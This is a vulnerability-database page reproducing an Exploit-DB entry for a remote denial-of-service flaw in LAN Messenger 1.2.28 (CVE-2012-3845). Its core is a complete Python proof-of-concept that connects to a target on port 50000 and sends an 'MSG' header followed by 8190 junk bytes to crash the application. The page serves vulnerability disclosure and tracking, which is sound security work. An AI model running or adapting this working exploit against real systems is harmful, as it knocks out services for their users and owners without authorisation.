Lucene search
+L

LAN Messenger 1.2.28 - Denial of Service

🗓️ 01 May 2012 00:00:00Reported by Julien AhrensType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

LAN Messenger 1.2.28 Remote Denial of Service Exploi

Related
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Cross-site Scripting in Astaro Security_Gateway_Software
30 Apr 201915:15
githubexploit
circl
Circl
CVE-2012-3845
1 May 201200:00
circl
cve
CVE
CVE-2012-3845
3 Jul 201222:00
cve
cvelist
Cvelist
CVE-2012-3845
3 Jul 201222:00
cvelist
nvd
NVD
CVE-2012-3845
3 Jul 201222:55
nvd
openvas
OpenVAS
LAN Messenger Malformed Initiation Request Remote DoS Vulnerability
3 May 201200:00
openvas
prion
Prion
Buffer overflow
3 Jul 201222:55
prion
#!/usr/bin/python

# Exploit Title: LAN Messenger <= v1.2.28 Remote Denial of Service Vulnerability
# Version:       <= v1.2.28
# Date:          2012-04-28
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://lanmsngr.sourceforge.net/
# Tested on:     Windows XP SP3 Professional German, Windows 2008R2 SP1 German
# Notes:         Under WinXP the app needs 8190 Bytes to crash
# Howto:         -

from struct import pack
import socket,sys
import os

target="192.168.0.1"
port=50000

junk = "\x41" * 8190

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

print "[*] Sending malformed request..."
s.send("\x4d\x53\x47" + junk)

print "[!] Exploit has been sent!\n"
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 May 2012 00:00Current
8High risk
Vulners AI Score8
CVSS 25
EPSS0.03307
37